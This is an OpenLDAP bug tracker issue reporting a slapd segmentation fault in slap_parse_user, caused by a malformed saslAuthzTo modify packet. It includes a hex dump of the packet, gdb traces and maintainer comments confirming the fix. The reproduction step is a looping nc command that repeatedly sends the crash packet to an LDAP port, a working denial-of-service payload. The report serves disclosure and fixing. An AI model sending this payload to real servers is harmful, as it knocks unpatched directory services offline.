Issue 9413 - Packet sometimes crashes openldap due to SIGSEGV in slap_parse_user, related to saslAuthzTo
Summary: Packet sometimes crashes openldap due to SIGSEGV in slap_parse_user, related ...
Status: VERIFIED FIXED
Alias: None
Product: OpenLDAP
Classification: Unclassified
Component: slapd (show other issues)
Version: unspecified
Hardware: All All
: --- normal
Target Milestone: 2.4.57
Assignee: OpenLDAP project
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2020-12-01 10:16 UTC by phasip
Modified: 2021-01-18 20:06 UTC (History)
0 users

See Also:


Attachments

Note You need to log in before you can comment on or make changes to this issue.
Description phasip 2020-12-01 10:16:44 UTC
A packet sometimes crashes openldap.

Thread 3 "slapd" hit Breakpoint 1, slap_parse_user (
    id=id@entry=0x7fff8aace860, user=user@entry=0x7fff8aace870, 
    realm=realm@entry=0x7fff8aace880, mech=mech@entry=0x7fff8aace890)
    at saslauthz.c:163
163			realm->bv_val = ber_bvchr( mech, '/' );
(gdb) x/x mech->bv_len
0xfffffffffffffffd:	Cannot access memory at address 0xfffffffffffffffd
(gdb) c
Continuing.

Thread 3 "slapd" received signal SIGSEGV, Segmentation fault.
__memchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:177

    
Packet:
    00000000: 3076 0201 8c66 3382 00cb 1e06 437e 0100  0v...f3.....C~..
    00000010: 3b3e 7d0b 7361 736c 4175 7468 7a54 6f42  ;>}.saslAuthzToB
    00000020: 113d 001f 1500 4707 753a 3a2e 4b37 7878  .=....G.u::.K7xx
    00000030: 017d c420 5bbb 19a8 1dad ef0c be46 0407  .}. [........F..
    00000040: 0fda f98d d6d3 f220 eae1 34a9 2bb2 d8a3  ....... ..4.+...
    00000050: 49af c341 69c1 4cd9 f00e e75c 05d6 2f90  I..Ai.L....\../.
    00000060: 79a6 930c 16e6 724e 135a 8d4c 9bdf 33db  y.....rN.Z.L..3.
    00000070: f3b9 256c 1a26 2060 2154 26ec 7cc7 3096  ..%l.& `!T&.|.0.
    00000080: 6fdc 92ea 295d 816d 8146 563b 3688 b2b4  o...)].m.FV;6...
    00000090: 2c20 d668 c91c 8c7a eb0d 3aca 8dbd 6fe1  , .h...z..:...o.
    000000a0: 58dd de97 bd3e 1d6a 13db 55fc be4a b5f4  X....>.j..U..J..
    000000b0: c660 f734 935d 5eea af28 8ef4 332c e9e3  .`.4.]^..(..3,..
    000000c0: e66d 1ab5 6372 c5f4 7802 f6f8 3301 7d5d  .m..cr..x...3.}]
    000000d0: 0f0b 5f38 e453 ec4e b733 a72f c687 2e0c  .._8.S.N.3./....
    000000e0: 009b 2588 9f8a a5                        ..%....



Gdb output:
    Starting program: /openldap/servers/slapd/slapd -h ldap://:1389/ -d 256
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    5fc616d5 @(#) $OpenLDAP: slapd 2.X (Dec  1 2020 08:25:21) $
        @1f8f0c8d0e86:/openldap/servers/slapd
    5fc616d5 slapd starting
    [New Thread 0x7fff8b2d3700 (LWP 27)]
    [New Thread 0x7fff8aad2700 (LWP 28)]
    5fc616d5 conn=1000 fd=11 ACCEPT from IP=[::1]:43154 (IP=[::]:1389)
    [New Thread 0x7fff8a2d1700 (LWP 29)]
    5fc616d5 conn=1000 op=0 MOD dn=""
    5fc616d5 conn=1000 op=0 MOD attr=saslAuthzTo
    [Switching to Thread 0x7fff8aad2700 (LWP 28)]

    Thread 3 "slapd" hit Breakpoint 1, slap_parse_user (
        id=id@entry=0x7fff8aace860, user=user@entry=0x7fff8aace870, 
        realm=realm@entry=0x7fff8aace880, mech=mech@entry=0x7fff8aace890)
        at saslauthz.c:163
    163			realm->bv_val = ber_bvchr( mech, '/' );
    (gdb) x/x mech->bv_len
    0xfffffffffffffffd:	Cannot access memory at address 0xfffffffffffffffd
    (gdb) x/x mech        
    0x7fff8aace890:	0xfffffffd
    (gdb) x/x mech->bv_val
    0x7fff8aace8a4:	0x0078374b
    (gdb) c
    Continuing.

    Thread 3 "slapd" received signal SIGSEGV, Segmentation fault.
    __memchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:177
    177	../sysdeps/x86_64/multiarch/memchr-avx2.S: No such file or directory.
    (gdb) bt
    #0  __memchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:177
    #1  0x00005555555cb6e1 in slap_parse_user (id=id@entry=0x7fff8aace860, 
        user=user@entry=0x7fff8aace870, realm=realm@entry=0x7fff8aace880, 
        mech=mech@entry=0x7fff8aace890) at saslauthz.c:163
    #2  0x00005555555cbf56 in authzPrettyNormal (val=val@entry=0x7fff7c0013e0, 
        normalized=normalized@entry=0x7fff8aad09b0, ctx=ctx@entry=0x0, 
        normalize=normalize@entry=0) at saslauthz.c:632
    #3  0x00005555555cdaa2 in authzPretty (syntax=<optimized out>, 
        val=0x7fff7c0013e0, out=0x7fff8aad09b0, ctx=0x0) at saslauthz.c:905
    #4  0x000055555559e6ce in ordered_value_pretty (ad=ad@entry=0x5555557934c0, 
        val=0x7fff7c0013e0, out=out@entry=0x7fff8aad09b0, ctx=ctx@entry=0x0)
        at value.c:511
    #5  0x000055555559a505 in slap_mods_check (op=op@entry=0x7fff7c000ff0, 
        ml=0x7fff7c101660, text=text@entry=0x7fff8aad1aa0, 
        textbuf=textbuf@entry=0x7fff8aad0a20 "saslAuthzTo", 
        textlen=textlen@entry=256, ctx=ctx@entry=0x0) at modify.c:574
    #6  0x000055555559b77e in do_modify (op=0x7fff7c000ff0, rs=0x7fff8aad1a80)
        at modify.c:165
    #7  0x0000555555583a59 in connection_operation (ctx=ctx@entry=0x7fff8aad1ba0, 
        arg_v=0x7fff7c000ff0) at connection.c:1163
    #8  0x00005555555840c0 in connection_read_thread (ctx=0x7fff8aad1ba0, argv=0xb)
        at connection.c:1314
    #9  0x0000555555670dbc in ldap_int_thread_pool_wrapper (xpool=0x555555798340)
    --Type <RET> for more, q to quit, c to continue without paging--
        at tpool.c:1051
    #10 0x00007ffff7faa609 in start_thread (arg=<optimized out>)
        at pthread_create.c:477
    #11 0x00007ffff7ed1293 in clone ()
        at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
    (gdb) 


Testing:
    (Alternative to using docker hub: docker build -t phasip/openldap https://github.com/Phasip/openldap-docker.git#main)
    (Also works on 2.4.56 bitnami image bitnami/openldap )
    docker run --privileged -it --net=host --entrypoint gdb phasip/openldap /openldap/servers/slapd/slapd -ex 'set args -h ldap://:1389/ -d 256' -ex 'run'
    while true; do echo -en '\x30\x76\x02\x01\x8c\x66\x33\x82\x00\xcb\x1e\x06\x43\x7e\x01\x00\x3b\x3e\x7d\x0b\x73\x61\x73\x6c\x41\x75\x74\x68\x7a\x54\x6f\x42\x11\x3d\x00\x1f\x15\x00\x47\x07\x75\x3a\x3a\x2e\x4b\x37\x78\x78\x01\x7d\xc4\x20\x5b\xbb\x19\xa8\x1d\xad\xef\x0c\xbe\x46\x04\x07\x0f\xda\xf9\x8d\xd6\xd3\xf2\x20\xea\xe1\x34\xa9\x2b\xb2\xd8\xa3\x49\xaf\xc3\x41\x69\xc1\x4c\xd9\xf0\x0e\xe7\x5c\x05\xd6\x2f\x90\x79\xa6\x93\x0c\x16\xe6\x72\x4e\x13\x5a\x8d\x4c\x9b\xdf\x33\xdb\xf3\xb9\x25\x6c\x1a\x26\x20\x60\x21\x54\x26\xec\x7c\xc7\x30\x96\x6f\xdc\x92\xea\x29\x5d\x81\x6d\x81\x46\x56\x3b\x36\x88\xb2\xb4\x2c\x20\xd6\x68\xc9\x1c\x8c\x7a\xeb\x0d\x3a\xca\x8d\xbd\x6f\xe1\x58\xdd\xde\x97\xbd\x3e\x1d\x6a\x13\xdb\x55\xfc\xbe\x4a\xb5\xf4\xc6\x60\xf7\x34\x93\x5d\x5e\xea\xaf\x28\x8e\xf4\x33\x2c\xe9\xe3\xe6\x6d\x1a\xb5\x63\x72\xc5\xf4\x78\x02\xf6\xf8\x33\x01\x7d\x5d\x0f\x0b\x5f\x38\xe4\x53\xec\x4e\xb7\x33\xa7\x2f\xc6\x87\x2e\x0c\x00\x9b\x25\x88\x9f\x8a\xa5' | nc localhost 1389; done
    
Bugfix:
    It may be enough to fix the memch->bv_len calculation on line 161 of saslauthz.c.
    However, as we have reported multiple issues in saslauthz there could be some common cause for all of them.
    saslauthz.c:161: mech->bv_len = user->bv_val - mech->bv_val - 1;
Comment 1 Howard Chu 2020-12-01 21:33:41 UTC
(In reply to phasip from comment #0)
> A packet sometimes crashes openldap.
> 
> Thread 3 "slapd" hit Breakpoint 1, slap_parse_user (
>     id=id@entry=0x7fff8aace860, user=user@entry=0x7fff8aace870, 
>     realm=realm@entry=0x7fff8aace880, mech=mech@entry=0x7fff8aace890)
>     at saslauthz.c:163
> 163			realm->bv_val = ber_bvchr( mech, '/' );
> (gdb) x/x mech->bv_len
> 0xfffffffffffffffd:	Cannot access memory at address 0xfffffffffffffffd
> (gdb) c
> Continuing.

Fixed in git master
Comment 2 Quanah Gibson-Mount 2020-12-02 22:00:02 UTC
trunk:

  • e394bcfa 
by Howard Chu at 2020-12-01T19:05:06+00:00 
ITS#9413 fix slap_parse_user


RE24:

  • d169e795 
by Howard Chu at 2020-12-02T21:48:18+00:00 
ITS#9413 fix slap_parse_user